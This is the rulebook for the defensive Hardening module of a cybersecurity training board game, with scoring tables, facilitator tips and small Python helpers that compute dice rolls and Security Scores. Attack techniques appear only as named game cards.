Quick-Win Rule (v2.2): You may deploy up to 2 BASIC-tier defenses as a single action (pay 10 Budget each). This keeps foundational hygiene affordable within the 7-turn limit.

Examples:
- Deploy Multi-Factor Authentication (ADVANCED - 15 Budget) on VPN access
- Deploy EDR on all workstations (ADVANCED - 15 Budget)
- Deploy Data Loss Prevention (DLP) on network gateways (ADVANCED - 15 Budget)
- Deploy Email Authentication (BASIC - 10 Budget) and User Security Training (BASIC - 10 Budget) together as one action (v2.2 Quick-Win)

Strategic Notes:
- BASIC defenses (10 Budget) are cheaper but carry smaller printed bonuses against Pentester Tactics
- ADVANCED defenses (15 Budget) provide good balance of cost/effectiveness
- ELITE defenses (25 Budget) are expensive but carry the largest printed bonuses against Pentester Tactics
Cost: 5 Budget per upgrade
Roll Required: None

How it works:
1. Choose a Defense Card already deployed (earlier this game, or carried over from Incident Response)
2. Pay 5 Budget
3. Mark defense with +2 effectiveness bonus (track on paper)
4. Optional: Describe the hardening (e.g., "Tuning behavioral analytics in EDR")

Effect:
- Defense effectiveness increases by +2
- Bonuses stack (EDR with three upgrades = +6 total)
- Counts toward Security Score (2 points per upgrade)
- Makes defense more resistant to Pentester Tactics

Examples of Hardening:
- "Harden our MFA by requiring hardware tokens instead of SMS" → MFA now has +2
- "Enhance Network Segmentation with microsegmentation inside critical zones" → NS now has +2
- "Improve SIEM with threat intelligence integration" → SIEM now has +2

Strategic Value:
- Fewer, well-hardened defenses can beat many basic ones
- Upgrades compound: 3 upgrades on one defense = +6 bonus
- Cost-effective way to improve security posture without full new deployments
Cost: 10 Budget per playbook
Roll Required: None
Limit (v2.2): Maximum 2 playbooks per game

How it works:
1. Choose a specific threat vector you want to prepare for (SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, or DATA EXFIL)
2. Write a 1-2 sentence playbook describing your response plan
3. Place playbook on the table with vector marked
4. When an attack using this vector occurs, you get one-time +3 bonus to your defense roll

Effect:
- Provides one-time +3 bonus to defense roll when matching vector is attacked
- Playbook is discarded after use (one-time only)
- Counts toward Security Score (10 points per playbook)
- Forces strategic thinking about which threats matter most

Example Playbooks:
- SOCIAL ENGINEERING: "Credential Compromise Response - Forced MFA re-authentication and access token revocation across all systems"
- MALWARE: "Ransomware Response - Immediate backup isolation, network segmentation, and process termination"
- NETWORK: "Lateral Movement Detection - Real-time network behavior analysis and suspicious SMB activity alert protocol"
- DATA EXFIL: "Data Theft Response - DLP block, endpoint containment, and forensic image capture"
- WEB EXPLOIT: "Web Attack Response - Immediate application firewall rule deployment and vulnerable component isolation"

Strategic Considerations:
- Playbooking is expensive (10 Budget) but provides large bonus (+3)
- You can only use each playbook once, and only create two per game (v2.2) — plan carefully
- Encourages predicting which threats are most dangerous
- Reflects real-world incident response playbook development
- Playbooks alone cannot win the game: victory requires at least 4 deployed defenses (v2.2)
Cost: 0 Budget (represents time investment)
Roll Required: 11+ on d20

How it works:
1. Announce you're conducting a security drill
2. Choose one or more deployed defenses to test
3. For each defense, roll 1d20
4. Defenses with roll 11+ are successful; 10 or less fail

Effect:
- Successful tests: Defense works properly (tracked as "tested")
- Failed tests: Implementation issues found (no penalty, but noted)
- Tests don't contribute to final score but provide confidence
- Teaches the importance of validation and testing

Educational Value:
- Reflects real-world practice of security testing
- Validates that deployments actually work
- Low-cost way to use budget on preparation vs. initial deployment
Typically after turn 3 or 4, once teams have deployed initial defenses.
Timing Options:
- Per turn: One Pentester Tactic drawn each turn (turns 3-6)
- Multiple attacks: 2-4 Pentester Tactics total (depends on difficulty)
- Final challenge: All remaining Tactics drawn at end of turn 6
(v2.2) The Hardening module uses the standard Pentester Tactic deck, PT-01 to PT-08, defined in cards/hardening/core-deck/pentester-tactic-cards.md. Each card is a realistic red-team technique with a printed DC (difficulty class) and a list of printed defense bonuses for specific Defense Cards.
| Card | Tactic | Target Vectors | Difficulty | Primary Defense |
|---|---|---|---|---|
| PT-01 | Social Engineering - Pretexting Attack | SOCIAL_ENGINEERING, CREDENTIAL_ABUSE | BASIC (DC 12) | D-02 User Training |
| PT-02 | Malware Evasion - Living-off-the-Land | MALWARE, CREDENTIAL_ABUSE | INTERMEDIATE (DC 13) | D-08 EDR |
| PT-03 | Credential Dumping - Mimikatz | CREDENTIAL_ABUSE, MALWARE | INTERMEDIATE (DC 13) | D-16 Credential Guard |
| PT-04 | Lateral Movement - Network Traversal | NETWORK, CREDENTIAL_ABUSE | INTERMEDIATE (DC 13) | D-09 Network Segmentation |
| PT-05 | Privilege Escalation - Unpatched Kernel Exploit | MALWARE, WEB_EXPLOIT | ADVANCED (DC 14) | D-03 Patch Management |
| PT-06 | Data Exfiltration - Unmonitored Channel | DATA_EXFIL, NETWORK | ADVANCED (DC 14) | D-11 DLP |
| PT-07 | Supply Chain Compromise - Trusted Update | MALWARE, WEB_EXPLOIT | ADVANCED (DC 14) | D-08 EDR / D-13 Threat Hunting |
| PT-08 | Insider Threat - Malicious Administrator | CREDENTIAL_ABUSE, DATA_EXFIL, NETWORK | EXPERT (DC 15) | D-22 SIEM / D-20 Zero Trust |
For expansion play, 8 additional tactics (PT-09 to PT-16) are available in cards/hardening/expansion-deck/advanced-tactics.md.
When a Pentester Tactic Card is drawn:
1. Threat Orchestrator Describes the Attack
Example (PT-01): "A pentester calls your IT helpdesk impersonating a VIP executive, demanding emergency access to critical systems..."
2. Blue Team Chooses ONE Deployed Defense to Resolve With
Example: "We resolve this with our User Security Training (D-02) — staff are trained to verify callers."
3. Roll the Defense Roll
Defense roll = d20
+ printed defense bonus for the chosen defense (from the tactic card's bonus list)
+ hardening upgrades on that defense (+2 each)
+ relevant playbook (+3, one-time, matching vector)
Success if the total ≥ the tactic card's printed DC.
Notes:
- Only ONE defense's printed bonus applies per roll. If your chosen defense isn't on the tactic's bonus list, its printed bonus is +0 (upgrades and playbooks still apply).
- Multi-vector or multi-phase tactics (e.g., PT-09): resolve each vector/phase as a separate roll, one chosen defense per roll.
- Playbooks are discarded after use.
4. Worked Example
Tactic: PT-01 Social Engineering - Pretexting (DC 12)
Chosen defense: D-02 User Security Training (printed bonus +2 vs PT-01)
D-02 has 1 hardening upgrade (+2)
SOCIAL ENGINEERING playbook available (+3)
Roll 1d20 = 7
Total = 7 + 2 (printed) + 2 (upgrade) + 3 (playbook) = 14
14 ≥ DC 12 → SUCCESS. Playbook is discarded.
5. Outcome
(v2.2: the old -10 Reputation penalty has been removed from Hardening — failed defenses simply score nothing and trigger the card's printed consequence. Reputation remains a Disaster Recovery mechanic.)
Security Score = (Defenses Deployed × 5)
+ (Hardening Upgrades × 2)
+ (Playbooks Created × 10) [max 2 playbooks]
+ (Pentester Tactics Defended × 5)
+ (Budget Remaining / Starting Budget) × 10
Turn 1: Deploy D-01 Email Auth + D-02 User Training (2 BASIC as one action) -20
Turn 2: Deploy D-04 Firewall Rules + D-19 Backup & DR (2 BASIC) -20
Turn 3: Deploy D-08 EDR (ADVANCED) -15
→ PT-02 strikes: defended ✓
Turn 4: Deploy D-09 Network Segmentation (ADVANCED) -15
Turn 5: Create MALWARE playbook -10
→ PT-01 strikes: defended ✓
Turn 6: Harden D-08 EDR (+2) -5
Turn 7: Deploy D-11 DLP (ADVANCED) -15
→ PT-06 strikes: defended ✓ (D-11's printed +4 bonus vs DC 14 carried the roll)
Budget spent: 100 → 50 remaining
Defenses Deployed: 7 × 5 = 35 points
Hardening Upgrades: 1 × 2 = 2 points
Playbooks Created: 1 × 10 = 10 points
Tactics Defended: 3 × 5 = 15 points
Budget Efficiency: (50/150) × 10 ≈ 3 points
─────────────────────────────────────
FINAL SECURITY SCORE: 65 points → Strong (Victory)
| Score | Level | Interpretation | Real-World Equivalent |
|---|---|---|---|
| 75+ | Exceptional | Enterprise-grade security posture | Large financial institution |
| 60-74 | Strong | Comprehensive defense-in-depth | Mid-market company |
| 45-59 | Adequate | Basic layered protection | Startup/small business |
| 30-44 | Weak | Minimal defenses, significant gaps | Under-resourced organization |
| Below 30 | Vulnerable | Inadequate protection, likely to fail | High-risk organization |
Blue Team Wins Hardening if ALL of:
- Final Security Score ≥ 60 (strong, comprehensive defense-in-depth)
- AND at least 4 defenses deployed (playbooks and upgrades alone cannot win)
- AND majority of Pentester Tactics defended against (defenses actually work)

Interpretation: Team successfully built layered, effective defenses within constraints.

Blue Team Loses Hardening if:
- Final Security Score < 45 (inadequate overall protection)
- OR Budget exhausted before completing hardening strategy
- OR majority of Pentester Tactics succeeded (defenses aren't effective)
Interpretation: Defenses are insufficient against realistic threats.
Scores between 45 and 59 that meet the tactic/defense requirements count as a partial success — adequate protection with room to improve.
All difficulty levels run 7 turns (v2.2); difficulty scales via Pentester Tactic count.
Too Easy:
- Teams deploy 8+ defenses with large budget remaining
- Almost all Pentester Tactics fail
- No meaningful decisions required
- Game feels trivial

Too Hard:
- Teams can only afford 3-4 defenses with budget exhausted
- Almost all Pentester Tactics succeed
- Team feels overwhelmed
- Frustration rather than learning

Just Right (within 7 actions and 150 Budget):
- Teams deploy 5-7 defenses with some budget remaining (the Quick-Win rule for BASIC pairs makes this achievable)
- 50-70% of Pentester Tactics fail (defenses work)
- Teams debate priorities and trade-offs
- Players learn through strategic choices

Adjustments:
- Lower budget (100) for harder game
- Higher budget (200) for easier game
- Fewer/more Pentester Tactics
- Provide feedback: "Your defenses are working well" or "Your SIEM isn't catching these"
Timing: Draw first tactic after turn 3-4 (let teams deploy initial defenses)
Narrative: Always frame tactics as specific scenarios:
- "Your red team just attempted a supply chain attack..."
- "An advanced attacker is using living-off-the-land techniques..."
- "A coordinated insider attack is beginning..."

Strategy: Escalate difficulty
- Turns 1-2: No tactics (deployment phase)
- Turn 3: First tactic (softer: PT-01, DC 12)
- Turn 4: Second tactic (medium: PT-02 to PT-04, DC 13)
- Turn 5+: Third/fourth tactics (harder: PT-05 to PT-08, DC 14-15)

- Defense-in-Depth: When a chosen defense earns only a +0/+1 printed bonus, discuss why layers matter
- Cost-Benefit: Teams overspend on Elite defenses; discuss Advanced alternatives
- Upgrades: Teams ignore upgrades; show how +2 bonuses compound
- Playbooks: Teams underestimate playbooks; demonstrate their power (+3 bonus) — and note the 2-per-game cap
| Learning Goal | How Module Teaches It |
|---|---|
| Defense-in-depth concept | Deploy multiple layers, see some fail while others succeed |
| Resource prioritization | Limited budget forces choices between defenses |
| Trade-offs in security | BASIC cheap but weak vs. ELITE expensive but strong |
| Proactive vs. reactive | Hardening teaches prevention vs. IR's response focus |
| Layering effectiveness | Pentester Tactics show how weak defenses alone fail |
| Incident playbooks | Playbook mechanic teaches the value of preparation |
| Security architecture | Thoughtful defense selection teaches how to think architecturally |
| Cost-benefit analysis | Every budget point spent has consequences |
| Action | Cost | Roll | Effect | Score |
|---|---|---|---|---|
| Deploy Defense | 10/15/25 | None | Active immediately (up to 2 BASIC per action, v2.2) | +5 each |
| Harden Upgrade | 5 | None | +2 effectiveness | +2 |
| Create Playbook | 10 | None | One-time +3 bonus (max 2 per game, v2.2) | +10 |
| Test & Drill | 0 | 11+ | Validates defense | +0 |
Pentester defense roll (v2.2): d20 + printed bonus (one chosen defense) + upgrades (+2 each) + playbook (+3) ≥ tactic DC. Each tactic defended: +5 Score.
After Winning Hardening:
- Continue to Incident Response (test your defenses)
- Continue to Audit & Compliance (verify your hardening)
- Play again with new threat vectors

After Losing Hardening:
- Replay with different strategy
- Try higher budget variation
- Study which Pentester Tactics caused most losses
- Plan for those tactics in next iteration
Changes for playtesters to validate, and why they were made:
cards/hardening/core-deck/pentester-tactic-cards.md. This removes duplicate, conflicting tactic definitions (including a "Persistence Expert" tactic that referenced a nonexistent PERSISTENCE vector).

Designer note — why playbook spam can't win (v2.2 math):
- Playbook-spam strategy: 2 playbooks (cap) = 20 pts; 0 defenses = 0 pts; with no deployed defenses every Pentester roll is d20 + 0 (+3 once per playbook) vs DC 12-15, so expect ~1 of 3 tactics defended = 5 pts; budget efficiency (130/150) × 10 ≈ 9 pts. Total ≈ 34 — below the 60 threshold, and it fails the ≥4-defenses gate regardless. Cannot win.
- Balanced layered strategy: 7 defenses (35) + 1 upgrade (2) + 1 playbook (10) + 3 of 3 tactics defended (15) + budget efficiency (50/150 × 10 ≈ 3) = 65 → Victory. See the worked example above.
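The v2.2 defense roll, the Security Score formula and the win/lose gates, as an added runnable example (written for this page, not the game's own code). It recomputes the PT-01 worked example (total 14 vs DC 12), the 7-turn example game (65 points, Victory) and the playbook-spam line from the designer note (about 34, a loss). Function names are assumptions; "budget exhausted" is modelled as 0 Budget remaining, which is also an assumption.

```python
"""Hardening module (v2.2) resolution helpers: Pentester defense roll, Security
Score and the win/lose gates. Added example for this page, not the game's own
code; function and field names are assumptions."""
from dataclasses import dataclass

STARTING_BUDGET = 150
PLAYBOOK_CAP = 2  # v2.2: maximum 2 playbooks per game


def defense_roll_total(d20, printed_bonus=0, upgrades=0, playbook=False):
    """d20 + printed bonus of the ONE chosen defense (+0 if it is not on the
    tactic's bonus list) + 2 per hardening upgrade on that defense
    + 3 if a matching playbook is spent on this roll."""
    return d20 + printed_bonus + 2 * upgrades + (3 if playbook else 0)


def defense_roll_succeeds(d20, dc, printed_bonus=0, upgrades=0, playbook=False):
    """Success if the total meets or beats the tactic card's printed DC."""
    return defense_roll_total(d20, printed_bonus, upgrades, playbook) >= dc


@dataclass
class HardeningTally:
    defenses_deployed: int
    upgrades: int
    playbooks: int
    tactics_defended: int
    tactics_faced: int
    budget_remaining: int
    starting_budget: int = STARTING_BUDGET


def security_score(t):
    """Defenses x5 + Upgrades x2 + Playbooks x10 (max 2) + Tactics Defended x5
    + (Budget Remaining / Starting Budget) x10, rounded as the manual does."""
    playbooks = min(t.playbooks, PLAYBOOK_CAP)
    efficiency = t.budget_remaining / t.starting_budget * 10
    return round(t.defenses_deployed * 5 + t.upgrades * 2 + playbooks * 10
                 + t.tactics_defended * 5 + efficiency)


def score_level(score):
    """Interpretation table from the manual."""
    if score >= 75:
        return "Exceptional"
    if score >= 60:
        return "Strong"
    if score >= 45:
        return "Adequate"
    if score >= 30:
        return "Weak"
    return "Vulnerable"


def hardening_outcome(t):
    """Apply the v2.2 gates. Returns (score, level, outcome).
    Victory needs score >= 60 AND >= 4 defenses AND a majority of tactics
    defended; a loss is score < 45 OR budget exhausted (assumed: 0 left)
    OR a majority of tactics succeeded; anything else is a partial success."""
    score = security_score(t)
    succeeded = t.tactics_faced - t.tactics_defended
    majority_defended = 2 * t.tactics_defended > t.tactics_faced
    majority_succeeded = 2 * succeeded > t.tactics_faced
    if score >= 60 and t.defenses_deployed >= 4 and majority_defended:
        outcome = "Victory"
    elif score < 45 or t.budget_remaining <= 0 or majority_succeeded:
        outcome = "Loss"
    else:
        outcome = "Partial success"
    return score, score_level(score), outcome


# Tallies taken from the manual's text (constructed here as inputs).
# 7-turn example game: 7 defenses, 1 upgrade, 1 playbook, 3/3 defended, 50 left.
EXAMPLE_GAME = HardeningTally(7, 1, 1, 3, 3, 50)
# Designer note: 2 playbooks, 0 defenses, ~1 of 3 defended, 130 Budget left.
PLAYBOOK_SPAM = HardeningTally(0, 0, 2, 1, 3, 130)

if __name__ == "__main__":
    # PT-01 worked example: roll 7, D-02 printed +2, one upgrade, playbook spent.
    print("PT-01 worked example total:", defense_roll_total(7, 2, 1, True))
    for name, tally in (("example game", EXAMPLE_GAME),
                        ("playbook spam", PLAYBOOK_SPAM)):
        print(name, hardening_outcome(tally))
```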
Hardening Module - Complete Rules
Part of Incident Zero, a modular cybersecurity board game · v2.2 - Playtest Edition
docs/standalone-games/hardening.md
Version: 2.2 - Playtest Edition
Duration: 30-45 minutes
Players: 1 Threat Orchestrator + 2-4 Blue Team members
Best For: Defense architecture training, security design, proactive hardening practice
The Hardening Module teaches players how to build defense-in-depth—layered security controls that work together to protect critical systems. Players deploy defenses strategically, harden existing controls, and defend against pentester challenges.
This module focuses on proactive security rather than reactive incident response.
All difficulty levels run 7 turns, one action per turn (v2.2). Difficulty scales via Pentester Tactic count.
| Difficulty | Budget | Turn Limit | Pentester Tactics | Best For |
|---|---|---|---|---|
| Beginner | 150 | 7 turns | 2 cards | First-time, teaching defense concepts |
| Intermediate | 150 | 7 turns | 3 cards | Standard play, balanced challenge |
| Advanced | 150 | 7 turns | 4 cards | Experienced players, comprehensive test |
Option A: Hypothetical Threat (Solo)
Threat Orchestrator describes a realistic threat scenario:
"Imagine your team successfully detected an attack last month. The attacker started with a phishing email, moved laterally through the network via SMB, and escalated privileges using a kernel exploit. Now you have time to harden your defenses. Here's the threat profile you need to defend against..."
Option B: Follow from Incident Response Module
If continuing from Incident Response:
- Use the attack chain that was just played
- Players now design defenses against those specific threats
- Discovered vectors guide defense selection

Option C: Generate Threat Vectors Randomly (v2.2 — one standard procedure)
Roll 1d6 for each of the six threat vectors to determine which threats you must defend against (1-2 = no notable threat, 3-4 = intermediate threat, 5-6 = advanced threat):
- Roll 1d6 for SOCIAL ENGINEERING threats
- Roll 1d6 for WEB EXPLOIT threats
- Roll 1d6 for CREDENTIAL ABUSE threats
- Roll 1d6 for MALWARE threats
- Roll 1d6 for NETWORK threats
- Roll 1d6 for DATA EXFIL threats

See: cards/network-building/core-deck/asset-cards.md

Each turn represents time allocated to hardening (15-30 minutes of planning work per turn).
TURN SEQUENCE:
1. START OF TURN
   - Read turn number aloud ("Hardening Turn 1...")
   - Remaining budget announced

2. BLUE TEAM'S TURN (2-3 minutes discussion)
   - Discuss which hardening action to take
   - Decide strategy (deploy new defense, upgrade existing, create playbook)

3. ACTION EXECUTION
   - Perform chosen action
   - No roll needed for deployment (see below for when rolls occur)
   - Update trackers

4. END OF TURN
   - Advance Turn Tracker by 1
   - Draw 1 new Defense Card
   - Check if mid-game Pentester Challenge should occur
Cost: 10/15/25 Budget (by tier)
Roll Required: None—automatic success

How it works:
1. Choose a Defense Card from your hand
2. Announce which Asset or threat vector it defends
3. Explain strategy (optional but encouraged): "Why are we deploying this defense?"
4. Card is placed on the table (face up)

Outcome:
- Defense is immediately active
- No roll needed
- All deployed defenses contribute to final Security Score
Quick-Win Rule (v2.2): You may deploy up to 2 BASIC-tier defenses as a single action (pay 10 Budget each).
Note (v2.2): The core deck contains one copy of each defense (D-01 to D-24), so each defense can only be deployed once per game. If you want duplicate deployments (e.g., two MFA implementations on different systems), print a second copy of the deck and house-rule it.
Cost: 5 Budget per upgrade
Roll Required: None

How it works:
1. Choose a Defense Card already deployed (from this turn or previous)
2. Pay 5 Budget
3. Mark defense with +2 effectiveness bonus (track on paper next to the card)
4. Optionally explain: "We're improving this defense by..."

Examples of hardening:
- "Hardening our EDR deployment by tuning behavioral analytics and adding threat intel integration" → EDR now has +2 bonus
- "Hardening our MFA implementation by enabling hardware token requirements" → MFA now has +2 bonus
- "Hardening Network Segmentation by adding microsegmentation within critical zones" → Network Seg now has +2 bonus

Strategic Value:
- Each upgrade adds +2 to the defense's effectiveness
- Upgrades can stack (e.g., MFA with +2, +2, +2 = +6 total)
- Upgraded defenses are more likely to survive Pentester Tactics
Cost: 10 Budget per playbook
Roll Required: None
Limit (v2.2): Maximum 2 playbooks per game

How it works:
1. Choose a specific threat vector you want to prepare for
2. Write a 1-2 sentence playbook describing your response (e.g., "Ransomware Outbreak Response: Immediate backup isolation, network segmentation, and access revocation")
3. Place playbook card on the table
4. When a Pentester uses a matching vector later, you get +3 bonus to your defense roll

Example Playbooks:
- "Credential Compromise Incident: Forced MFA re-authentication and access token revocation"
- "Supply Chain Attack Detection: Monitor unusual DNS and C2 beaconing patterns"
- "Insider Threat Response: Behavioral analytics review and privileged access audit"
- "Ransomware Response: Immediate backup isolation and network segmentation"

Strategic Value:
- Playbooks cost more (10 Budget) but provide a larger bonus (+3)
- Limited use (one-time per playbook, then discarded after use; max 2 per game)
- Forces teams to predict which threats are most dangerous
- Playbooks alone cannot win: victory requires at least 4 deployed defenses (v2.2)
Cost: 0 Budget (represents time, not money)
Roll Required: 11+ on d20

How it works:
1. Announce you're conducting a drill/test of deployed defenses
2. Choose one or more deployed defenses to test
3. Roll 1d20 for each defense
4. Each defense with a roll of 11+ succeeds; 10 or less fails

Outcome:
- Success: Defense works properly; mark it as "tested" (contributes extra points at end)
- Failure: Defense has implementation issues; no penalty, but doesn't count toward testing bonus

Strategic Value:
- Free way to validate defenses
- Successful tests add confidence (and points) but don't guarantee success against real attacks
- Encourages thinking about deployment validation (realistic practice)
After turn 3 or 4, the Threat Orchestrator draws a Pentester Tactic Card (PT-01 to PT-08, see cards/hardening/core-deck/pentester-tactic-cards.md) and launches a simulated attack.
1. TO Describes the Attack Scenario
   Example (PT-02): "Your red team delivered a payload that uses only built-in Windows tools — living-off-the-land. Can your defenses detect it?"
2. Blue Team Chooses ONE Deployed Defense to Resolve With
   Team selects one deployed defense to defend against this attack
3. Roll the Defense Roll
Defense roll = d20 + printed defense bonus for the chosen defense (from the tactic card's bonus list) + hardening upgrades on that defense (+2 each) + relevant playbook (+3, one-time, matching vector)
Success if the total ≥ the tactic card's printed DC (DC 12-15 for PT-01 to PT-08).
If the chosen defense isn't on the tactic's bonus list, its printed bonus is +0 (upgrades and playbooks still apply). Multi-vector tactics: two separate rolls, one defense each.
4. Outcome
   - Success: Defense holds; count as a Pentester Tactic Defended (+5 Security Score)
   - Failure: Attack succeeds; apply the consequence printed on the tactic card; no score for this tactic
Optional: Play multiple pentester tactics (2-4 total) across turns 3-6.
Defenses Deployed: Count × 5 points
Hardening Upgrades: Count × 2 points
Playbooks Created: Count × 10 points [max 2 playbooks per game]
Pentester Tactics Defended: Count × 5 points
Budget Efficiency: (Remaining Budget / Starting Budget) × 10 points
EXAMPLE (150 starting budget, 7 turns):
- 7 defenses deployed (two turns used the 2-BASIC Quick-Win): 35 points
- 1 hardening upgrade: 2 points
- 1 playbook created: 10 points
- 3 of 3 pentester tactics defended: 15 points
- 50 budget remaining (spent 100): (50/150) × 10 ≈ 3 points
────────────────────────────
TOTAL SECURITY SCORE: 65 points → Strong (Victory)
| Score | Level | Interpretation |
|---|---|---|
| 75+ | Exceptional | Enterprise-grade security posture; sophisticated threat preparedness |
| 60-74 | Strong | Mid-market ready; layered, comprehensive defenses |
| 45-59 | Adequate | Startup-level protection; covers main attack vectors |
| 30-44 | Weak | Minimal protection; significant gaps remain |
| Below 30 | Vulnerable | Inadequate defenses; likely to fail against sophisticated attacks |
Blue Team Wins Hardening if ALL of:
- Final Security Score ≥ 60 (strong layered defenses)
- AND at least 4 defenses deployed (playbooks and upgrades alone cannot win)
- AND majority of Pentester Tactics were successfully defended against

Blue Team Loses Hardening if:
- Final Security Score < 45 (inadequate protection)
- OR Budget exhausted before defenses were deployed
- OR majority of Pentester Tactics succeeded despite defenses
Scores of 45-59 that meet the tactic/defense requirements count as a partial success.
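The defense roll in step 3 of the Pentester Challenge and the scoring and victory rules above are the only arithmetic in this module, and both are easy to get wrong at the table. The following is an added example, not part of the Incident Zero bundle: a small Python helper that applies the v2.2 rules as written on this page (the PT-02 values are copied from that card in the Pentester Tactic Cards file). One reading is an assumption and is marked as such in the code: "Budget exhausted before defenses were deployed" is treated as reaching 0 Budget with fewer than 4 defenses on the table.

```python
"""Incident Zero Hardening module helpers (added example, not from the bundle):
resolve a Pentester Tactic defense roll and compute the end-of-module
Security Score and result, following the v2.2 rules text."""
from dataclasses import dataclass


@dataclass
class Defense:
    card_id: str
    upgrades: int = 0       # Harden Upgrades on this card, +2 each


@dataclass
class Playbook:
    vector: str
    used: bool = False      # a playbook is discarded after its single use


# PT-02 as printed on the card: DC 13, target vectors, printed bonus list
PT_02 = {
    "dc": 13,
    "vectors": {"MALWARE", "CREDENTIAL_ABUSE"},
    "bonuses": {"D-06": 1, "D-08": 3, "D-13": 2, "D-14": 2},
}


def defense_roll_total(d20, defense, tactic, playbooks):
    """d20 + printed bonus (+0 if the chosen defense is not on the tactic's
    bonus list) + 2 per upgrade + 3 for one unused playbook whose vector
    matches the tactic. The matching playbook is consumed."""
    total = d20 + tactic["bonuses"].get(defense.card_id, 0) + 2 * defense.upgrades
    for pb in playbooks:
        if not pb.used and pb.vector in tactic["vectors"]:
            pb.used = True          # one-time bonus, spent here
            total += 3
            break
    return total


def resolve_tactic(d20, defense, tactic, playbooks):
    """True when the defense holds (total >= the tactic's printed DC)."""
    return defense_roll_total(d20, defense, tactic, playbooks) >= tactic["dc"]


def security_score(defenses, upgrades, playbooks, tactics_defended, remaining, starting):
    """Defenses x5 + upgrades x2 + playbooks x10 (max 2) + tactics defended x5
    + budget efficiency (remaining / starting x 10, rounded)."""
    efficiency = round(remaining / starting * 10)
    return (5 * defenses + 2 * upgrades + 10 * min(playbooks, 2)
            + 5 * tactics_defended + efficiency)


def score_level(score):
    """Interpretation band from the Security Score table."""
    if score >= 75:
        return "Exceptional"
    if score >= 60:
        return "Strong"
    if score >= 45:
        return "Adequate"
    if score >= 30:
        return "Weak"
    return "Vulnerable"


def hardening_result(score, defenses, tactics_defended, tactics_total, remaining):
    """'win', 'partial', 'loss', or 'open' for a case the rules leave unstated
    (for example an even split of tactics, which is neither majority)."""
    defended_majority = 2 * tactics_defended > tactics_total
    succeeded_majority = 2 * (tactics_total - tactics_defended) > tactics_total
    # Assumption: "Budget exhausted before defenses were deployed" read as
    # hitting 0 Budget with fewer than 4 defenses on the table.
    exhausted_early = remaining <= 0 and defenses < 4
    if score < 45 or exhausted_early or succeeded_majority:
        return "loss"
    if defenses >= 4 and defended_majority:
        return "win" if score >= 60 else "partial"
    return "open"
```

Running `security_score(7, 1, 1, 3, 50, 150)` reproduces the 65-point worked example above, and `resolve_tactic` with a defense that is not on the tactic's bonus list gives the +0 case called out in step 3.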
PART 1: DEFENSE STRATEGY (3 min)
1. "How did you prioritize which defenses to deploy first?"
2. "What layers of defense work best together?"
3. "Did the Pentester Tactics reveal gaps? Which ones?"

PART 2: RESOURCE MANAGEMENT (2 min)
1. "Did you run out of budget? Would more budget have helped?"
2. "Which defenses provided the best value (cost vs. effectiveness)?"
3. "Would you have allocated budget differently?"

PART 3: PENTESTER RESULTS (2-3 min)
1. "Which Pentester Tactic was most surprising?"
2. "Which defense was most valuable against attacks?"
3. "How would you harden further given unlimited budget?"

PART 4: REAL-WORLD APPLICATION (2 min)
1. "If you were hardening your actual organization, what would you deploy first?"
2. "Why is defense-in-depth difficult in practice?"
3. "What's the hardest part of maintaining layered security?"
Too Easy:
- Teams deploy 8+ defenses with budget to spare
- All Pentester Tactics fail
- No difficult decisions required

Too Hard:
- Teams can only afford 3-4 defenses
- Most Pentester Tactics succeed
- Team feels overwhelmed

Just Right:
- Teams deploy 5-7 defenses with some budget left
- 50-70% of Pentester Tactics fail
- Teams debate defense priorities

Adjust by:
- Starting budget (120, 150, or 180)
- Number of Pentester Tactics (2, 3, or 4)
- Defense card availability (more common defense draws)
Narrative framing: "Your red team has tested your defenses..."
If multiple teams are hardening simultaneously:
- All teams get the same starting threat vectors
- All teams draw from the same card deck (or equivalent decks)
- Highest Security Score wins
- Tiebreaker: Most Budget remaining

Threat Vector: SOCIAL ENGINEERING
Budget: 150
Pentester Tactics: 2

Setup: "Your team detected a phishing attack. Now harden against social engineering threats."

Suggested defenses:
- D-01: Email Authentication Setup (BASIC)
- D-02: User Security Training (BASIC)
- D-07: Multi-Factor Authentication (ADVANCED)
- D-20: Zero Trust Access Control (ELITE)
Threat Vectors: MALWARE, DATA EXFIL, NETWORK
Budget: 150
Pentester Tactics: 3

Setup: "A ransomware variant targeted your industry. Prepare your defenses."

Key defenses:
- D-08: EDR (Endpoint Detection & Response)
- D-11: Data Loss Prevention (DLP)
- D-09: Network Segmentation
- D-15: Deception Technology (Honeypots)
- D-19: Backup & Disaster Recovery
- D-23: IR Program & Runbooks

Threat Vectors: All 6 (SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, DATA EXFIL)
Budget: 150
Pentester Tactics: 4
Setup: "Your enterprise faces threats across all vectors. Build comprehensive defense-in-depth."
Challenge: Defend against all six vectors with limited budget
Duration: 45-60 minutes
- Start with Budget: 200 (more resources)
- Play 9 turns instead of 7 (more time)
- 4-5 Pentester Tactics (more challenges)
- Raise the playbook cap from 2 to 3

Focus on layering:
- Each turn, discuss why defenses work together
- Create explicit layer descriptions: "Layer 1 (Prevention), Layer 2 (Detection), Layer 3 (Response)"
- Score based on how well defenses complement each other

Add compliance requirement:
- Teams must defend against threat vectors while meeting compliance requirements (PCI-DSS, GDPR, HIPAA)
- Some defenses satisfy both security and compliance
- Creates strategic depth

If you won:
- Continue to Incident Response Module (as follow-up) → Test your defenses against attacks
- Continue to Audit & Compliance Module → Validate your security posture

If you lost:
- Replay with higher budget
- Try a less complex scenario
- Play Incident Response to understand what defenses are actually needed
Standalone: Play again with different threat vectors and Pentester Tactics
| Action | Cost | Effect | Roll |
|---|---|---|---|
| Deploy Defense | 10/15/25 | Defense active immediately (up to 2 BASIC per action, v2.2) | None |
| Harden Upgrade | 5 | +2 effectiveness to defense | None |
| Create Playbook | 10 | +3 bonus when used once (max 2 per game, v2.2) | None |
| Test & Drill | 0 | Validate defenses | 11+ |
Pentester defense roll (v2.2): d20 + printed bonus (one chosen defense) + upgrades (+2 each) + playbook (+3) ≥ tactic DC.
For the full list of v2.2 changes and the reasoning behind them, see the "v2.2 Playtest Edition Changes" section in Module: Hardening.
Hardening Module - Standalone Play Guide Part of Incident Zero, a modular cybersecurity board game
cards/hardening/core-deck/defense-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
These 24 Defense Cards are shared between the Incident Response and Hardening modules. In Hardening, teams deploy these same defenses to build defense-in-depth and test them against Pentester Tactics.
Note (v2.2): Tiers are grouped by section below. Card IDs are stable and do not renumber when a card's tier changes, so IDs within a section are not always contiguous.
